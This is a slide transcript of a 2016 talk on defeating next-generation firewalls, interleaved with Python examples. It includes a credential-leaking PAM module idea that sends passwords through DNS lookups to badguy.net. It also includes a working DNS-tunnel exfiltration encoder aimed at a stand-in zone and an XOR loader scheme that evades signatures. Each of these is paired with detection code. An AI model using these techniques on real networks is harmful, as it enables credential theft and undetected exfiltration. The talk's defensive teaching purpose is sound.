
Defeating Next Gen Firewalls


Atlseccon 2016


evandentremont

April 10, 2016

Transcript

  1. Defeating Next Gen Firewalls

  2. Topics
     • Past issues
     • Current issues
     • Future issues
     • What can I do?
  3. A Brief History Lesson
     • NAT
     • Stateful firewalls
     • Port-based rules
     • Application-based rules / deep packet inspection
     • Active probing
  4. Current State of Affairs
     NGFWs are great for:
     • beating script kiddies
     • beating mass scans
     • application control
       ◦ BitTorrent
       ◦ Netflix
     To be fair, this is 99.7% of attacks on the internet.
  5. L33T Script Kitty

  6. Current State of Affairs
     NGFWs don't work against sophisticated attackers / advanced threats.
     “Not allowed to call it an APT if it's OWASP Top 10” - the Grugq
  7. Current Issues

  8. Evasion
     Evasion on the inside is not (usually) picked up by the border firewall.
     • Network visibility
     • Behind the firewall
     • IDS doesn't typically inspect internal traffic.
  9. Alert Fatigue
     • True positive
       ◦ 99.7% (check this) according to FortiGate
       ◦ Comparison to something to put in context
     • True negative
       ◦ Legitimate traffic
     • False negative
       ◦ Hurts more, not measurable
     • False positive
       ◦ Affects reputation of vendor
  10. IP Reputation
     The antivirus / host-level detection model applied to networks.
     • Rent a botnet...
     • How long does it take for a reputation to circulate?
       ◦ About an hour.
     • Stay inside that lag and rotate IPs.
       ◦ #Snowshoes (snowshoe spamming: low volume spread over many addresses)
  11. IP Reputation 82.148.97.69

  12. IP Reputation 82.148.97.69

  13. IP Reputation - CDN
     • CDNs cause collateral damage
       ◦ Everyone takes advantage of the cloud
       ◦ You're effectively unbannable on a popular CDN
       ◦ Blocking AWS means blocking 30% of web requests: Netflix, Airbnb, Yelp, Comcast, Slack, Adobe, NASA, Dow, CIA...
  14. !Visibility
     Protocol tunneling / DNS / ICMP
     • DNS tunnel via authoritative servers
       ◦ Public code to do this!
         ▪ https://github.com/iagox86/dnscat2
       ◦ Add a PAM module that does a DNS lookup of edentremont.P@SSW0RD.badguy.net (the attacker's authoritative server logs the query, credentials and all)
     • Tor
       ◦ Anonymity network defeats IP reputation
     • Legal dept.
       ◦ Attacks that aren't publicly disclosed may not be in signature lists (for liability reasons)
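The DNS channel above (a lookup whose labels carry the data, answered by a name server the attacker controls) and the check a defender would run against it, as an added example in Python. This is neither dnscat2's code nor the speaker's: the zone badguy.example, the toy tunnel format (sequence-number label plus a base32 label), the 1 KiB "stolen file" and the resolver log are all constructed for the example, and the detector thresholds are assumptions to be tuned against your own query volume.

```python
import base64
import hashlib
import math
from collections import Counter, defaultdict

# Hypothetical attacker-controlled zone (constructed name, not a real domain).
# Whoever runs its authoritative name server sees every query for it, so the
# query names themselves are the exfiltration channel.
EXFIL_ZONE = "badguy.example"
MAX_LABEL = 63  # RFC 1035 limit on a single label


def encode_queries(payload: bytes, zone: str = EXFIL_ZONE, chunk: int = 40) -> list:
    """Sender side of a minimal DNS tunnel: base32 (DNS-safe, case-insensitive),
    cut into fixed-size labels, each prefixed with a sequence number so the
    receiver can reassemble out-of-order or retried queries."""
    assert chunk <= MAX_LABEL
    b32 = base64.b32encode(payload).decode().rstrip("=").lower()
    return [f"{seq}.{b32[i:i + chunk]}.{zone}"
            for seq, i in enumerate(range(0, len(b32), chunk))]


def decode_queries(names: list, zone: str = EXFIL_ZONE) -> bytes:
    """Receiver side (the authoritative server's query log): strip the zone,
    order by sequence number, restore base32 padding and decode."""
    zone_depth = zone.count(".") + 1
    parts = {}
    for name in names:
        labels = name.rstrip(".").split(".")[:-zone_depth]
        parts[int(labels[0])] = "".join(labels[1:])
    b32 = "".join(parts[k] for k in sorted(parts)).upper()
    b32 += "=" * (-len(b32) % 8)
    return base64.b32decode(b32)


def shannon_entropy(s: str) -> float:
    """Bits per character; base32 data approaches 5, real hostnames stay low."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def flag_tunnel_candidates(query_log: list, min_queries: int = 20,
                           min_label_len: int = 30, min_entropy: float = 3.5) -> dict:
    """Detection side: a tunnel shows up as many distinct, long, high-entropy
    subdomains under one zone. query_log is a list of (client_ip, qname).
    Returns {zone: stats} for every zone exceeding all three thresholds."""
    per_zone = defaultdict(list)
    for _client, qname in query_log:
        labels = qname.lower().rstrip(".").split(".")
        # Naive zone guess: the last two labels. A real detector would use the
        # Public Suffix List so that "foo.co.uk" is not treated as a zone.
        per_zone[".".join(labels[-2:])].append(labels[:-2])
    flagged = {}
    for zone, subs in per_zone.items():
        subs = [s for s in subs if s]
        if len({".".join(s) for s in subs}) < min_queries:
            continue
        avg_len = sum(max(len(lab) for lab in s) for s in subs) / len(subs)
        avg_ent = sum(shannon_entropy("".join(s)) for s in subs) / len(subs)
        if avg_len >= min_label_len and avg_ent >= min_entropy:
            flagged[zone] = {"queries": len(subs),
                             "avg_longest_label": round(avg_len, 1),
                             "avg_entropy": round(avg_ent, 2)}
    return flagged


# Constructed 1 KiB "stolen file": pseudo-random bytes, so it behaves like a
# compressed or encrypted document rather than plain text.
SECRET = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(32))

# Constructed resolver log: ordinary lookups from one host, then the tunnel.
BENIGN_QUERIES = [("10.0.0.5", q) for q in (
    "www.example.com", "mail.example.com", "cdn.example.com",
    "update.vendor.example", "www.google.com", "ssl.gstatic.com")]


def sample_log() -> list:
    return BENIGN_QUERIES + [("10.0.0.5", q) for q in encode_queries(SECRET)]


if __name__ == "__main__":
    names = encode_queries(SECRET)
    print(f"{len(names)} queries, first: {names[0]}")
    assert decode_queries(names) == SECRET
    print(flag_tunnel_candidates(sample_log()))
```

The detector keys on volume, label length and entropy rather than on any signature, which is the only angle that survives the tunnel author changing the encoding; the price is that it needs per-zone aggregation over a window, so it runs on the resolver log, not inline on the border firewall.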
  15. Signatures
     • Content analysis
       ◦ Deep inspection
         ▪ Computational complexity
         ▪ Latency
       ◦ Signature-based detection
       ◦ IDS is reactive: it has to know about the attack first
       ◦ Brittle: it is signature-based, so if the payload is modified it won't be found
         ▪ Wrap a loader around it and XOR the binary.
         ▪ NOPs, obfuscation, etc.
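The "loader around it and XOR the binary" point as an added example (not the speaker's code): a byte-pattern signature matched against a constructed PE-like blob, the same blob XOR-encoded behind a stub, and the sensor's cheap counter of sweeping all 256 single-byte keys before matching, which recovers a one-byte key and does nothing against a four-byte one. The STUB framing and the payload bytes are made up for the example; the signature string itself is the standard DOS-stub message that real PE executables carry.

```python
# A byte pattern a signature-based IDS or AV might match on. This string
# appears in the DOS stub of nearly every Windows PE executable.
SIGNATURE = b"This program cannot be run in DOS mode"

# Constructed stand-in for a malicious executable: a PE-like header region
# containing the signature string, followed by filler "code".
PAYLOAD = b"MZ" + bytes(62) + SIGNATURE + b"\r\r\n$" + bytes(range(256)) * 2


def signature_hits(blob: bytes, sigs=(SIGNATURE,)) -> list:
    """What a content-inspecting sensor does: look for known byte patterns.
    Returns [(offset, signature)] for every match."""
    hits = []
    for sig in sigs:
        start = 0
        while (i := blob.find(sig, start)) != -1:
            hits.append((i, sig))
            start = i + 1
    return hits


def xor_encode(data: bytes, key: bytes) -> bytes:
    """XOR with a repeating key. Self-inverse, so the same function is the
    decoder the loader stub runs after delivery."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def on_the_wire(key: bytes) -> bytes:
    """What the firewall sees: a tiny stub header carrying the key, then the
    encoded payload. The STUB framing is constructed for this example."""
    return b"STUB" + bytes([len(key)]) + key + xor_encode(PAYLOAD, key)


def stub_decode(wire: bytes) -> bytes:
    """What runs on the victim: read the key back out and undo the XOR."""
    assert wire[:4] == b"STUB"
    klen = wire[4]
    key = wire[5:5 + klen]
    return xor_encode(wire[5 + klen:], key)


def single_byte_xor_sweep(blob: bytes, sigs=(SIGNATURE,)) -> list:
    """The sensor's counter: try every single-byte key before matching.
    Cheap (256 passes), catches the laziest encoders, and is blind to anything
    with a longer key. Returns [(key, offset, signature)]."""
    found = []
    for k in range(256):
        for off, sig in signature_hits(xor_encode(blob, bytes([k])), sigs):
            found.append((k, off, sig))
    return found


if __name__ == "__main__":
    print("plain:", signature_hits(PAYLOAD))
    print("xor 0x5a, plain match:", signature_hits(on_the_wire(b"\x5a")))
    print("xor 0x5a, sweep:", single_byte_xor_sweep(on_the_wire(b"\x5a")))
    print("xor 4-byte key, sweep:", single_byte_xor_sweep(on_the_wire(b"\xde\xad\xbe\xef")))
```

The arms race the slide describes is visible in the last two lines: the defender can afford 256 trial decodes per object, the attacker answers with a longer key, and the next defensive step is not more signatures but a different feature entirely (entropy of the blob, or the stub itself, which is now the thing to signature).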
  16. Low Tech
     Simply bypassing an NGFW is a legitimate attack against an NGFW. A concern for internal personnel / contractors.
     • Walk into the NSA with a Taylor Swift CD-RW with a single song on it.
       ◦ Walk out with the Snowden archives.
     • Dial out over the phone network
       ◦ 1 (800) BAD-GUYS ext 146 398 832
     • Mail an RPi to a non-existent employee
       ◦ Physical access via their mailroom
  17. Future Issues
     We're assuming we can even inspect traffic...

  18. Directly exploiting the NGFW
     • Sending malformed executables that break the signature detection
       ◦ They fail open
       ◦ The failsafe (failing closed) would be a DDoS. No easy answer.
     • Magic passwords (hard-coded vendor credentials)
       ◦ Assuming the vendor doesn't drop the ball
  19. Cryptography
     • Certs are cheap to free.
     • Let's Encrypt for malware
       ◦ https://letsencrypt.org/2015/10/29/phishing-and-malware.html
       ◦ “Not our job to be content watchdogs and a DV cert is not that” - Let's Encrypt
     • Key pinning (HPKP)
       ◦ Makes MITM implausible (browsers have since removed HPKP support entirely, so this defence no longer exists in practice)
       ◦ Facebook, Google, Dropbox, tor2web do it.
  20. Cryptography
     • End-to-end crypto makes inspection harder
       ◦ Computationally expensive
       ◦ Introduces latency
       ◦ SNI collateral (blocking on the plaintext SNI hits everything behind a shared front end)
     • SSL termination is usually impractical
       ◦ Not everyone can do it:
         ▪ A university can, a corp can; BYOD is difficult
         ▪ An ISP can't
       ◦ 11% of the internet is SSL terminated.
       ◦ Not generally done at a national scale.
         ▪ Technically North Korea could • #redstarOS
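Why SNI is "collateral": even without terminating TLS, the hostname travels in the clear in the ClientHello, so a firewall can block by name, but on a CDN one name fronts many tenants. As an added example (not code from the talk), a builder for a minimal ClientHello record and a parser that extracts the host_name with no decryption at all; the record layout follows RFC 5246 and RFC 6066, the random and session id are zeroed, and the hostnames are constructed. TLS 1.3's Encrypted Client Hello extension (still an IETF draft, but deployed by some browsers and CDNs) encrypts the SNI and postdates this talk.

```python
import struct
from typing import Optional

REC_HANDSHAKE = 0x16
HS_CLIENT_HELLO = 0x01
EXT_SERVER_NAME = 0x0000
EXT_PADDING = 0x0015


def build_client_hello(sni: Optional[str], ciphers=(0x1301, 0x1302, 0xC02F)) -> bytes:
    """Construct a minimal TLS 1.2-style ClientHello record (random and
    session_id zeroed, constructed for this example). sni=None omits the
    extension block entirely, as an old client would."""
    body = b"\x03\x03" + bytes(32)  # client_version, random
    body += b"\x00"  # empty session_id
    suites = b"".join(struct.pack("!H", c) for c in ciphers)
    body += struct.pack("!H", len(suites)) + suites
    body += b"\x01\x00"  # one compression method: null
    if sni is not None:
        host = sni.encode("ascii")
        entry = b"\x00" + struct.pack("!H", len(host)) + host  # name_type 0 = host_name
        sni_data = struct.pack("!H", len(entry)) + entry
        exts = struct.pack("!HH", EXT_PADDING, 4) + bytes(4)  # unrelated extension first
        exts += struct.pack("!HH", EXT_SERVER_NAME, len(sni_data)) + sni_data
        body += struct.pack("!H", len(exts)) + exts
    handshake = bytes([HS_CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body
    return bytes([REC_HANDSHAKE]) + b"\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def extract_sni(record: bytes) -> Optional[str]:
    """Pull the host_name out of a ClientHello without terminating TLS.
    Returns None for anything that is not a complete, well-formed ClientHello
    carrying SNI, including truncated captures and non-handshake records."""
    try:
        if record[0] != REC_HANDSHAKE:
            return None
        (rec_len,) = struct.unpack("!H", record[3:5])
        hs = record[5:5 + rec_len]
        if len(hs) < rec_len or hs[0] != HS_CLIENT_HELLO:
            return None  # truncated record, or not a ClientHello
        hs_len = int.from_bytes(hs[1:4], "big")
        body = hs[4:4 + hs_len]
        if len(body) < hs_len:
            return None
        p = 2 + 32  # skip client_version and random
        p += 1 + body[p]  # session_id
        (cs_len,) = struct.unpack("!H", body[p:p + 2])
        p += 2 + cs_len  # cipher_suites
        p += 1 + body[p]  # compression_methods
        if p + 2 > len(body):
            return None  # no extensions at all
        (ext_len,) = struct.unpack("!H", body[p:p + 2])
        p += 2
        end = p + ext_len
        while p + 4 <= end:
            etype, elen = struct.unpack("!HH", body[p:p + 4])
            p += 4
            data = body[p:p + elen]
            p += elen
            if etype != EXT_SERVER_NAME:
                continue
            q = 2  # skip server_name_list length
            while q + 3 <= len(data):
                ntype = data[q]
                (nlen,) = struct.unpack("!H", data[q + 1:q + 3])
                q += 3
                name = data[q:q + nlen]
                q += nlen
                if ntype == 0:
                    return name.decode("ascii", "replace")
        return None
    except (IndexError, struct.error):
        return None


if __name__ == "__main__":
    for host in ("edentremont.badguy.example", "cdn-shared.example", None):
        rec = build_client_hello(host)
        print(host, "->", extract_sni(rec))
```

The parser returns None on anything malformed rather than raising, which leaves the fail-open / fail-closed decision from the "Directly exploiting the NGFW" slide to the caller's policy instead of to an exception. Blocking on the returned name is then a one-line set lookup, and so is the collateral: every tenant whose traffic arrives with the same SNI goes with it.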
  21. OSI Layer 8
     • Moving further up the OSI layers makes detection asymptotically more difficult
       ◦ HPKP means you can't SSL terminate (on unmanaged clients; browsers skip pin validation for chains that end in a locally installed root, so a corporate interception CA pushed to managed devices still works)
       ◦ Even if you could...
     • Hiding within legitimate traffic
       ◦ Infeasible to detect in real time
       ◦ Traditional: hiding in images
       ◦ Hiding in videos - YouTube numbers station
       ◦ Hiding in syntax - HASK talk
  22. What’s even the point?!

  23. The Point
     What are you trying to protect? If you're pwned, what's the goal?
     • Your data?
       ◦ Data loss prevention / data loss protection
         ▪ The filter can't be rich or intrusive enough
         ▪ e.g. a JPG of SIN numbers posted over Facebook
     • Sabotage?
     • Vandalism?
  24. What can I do?

  25. What can I do?
     • Patch your shit - Julien Savoie
     • Only store what you need to
     • Air-gapped storage
       ◦ Robot tape loaders
       ◦ Encrypted offline storage / encryption at rest
       ◦ Cryptolocker
     • Host-level security
       ◦ Encryption provides end-to-end security
       ◦ The bad guy controls one end;
       ◦ you control the other.
  26. To be blunt:
     • On a scale of now to infinity... you are getting pwned.
     • How soon, and what do you lose?
     • Minimizing impact is the goal.
  27. Any Questions?
     I hereby unilaterally reserve the right to ignore 902 Nerds and their agents.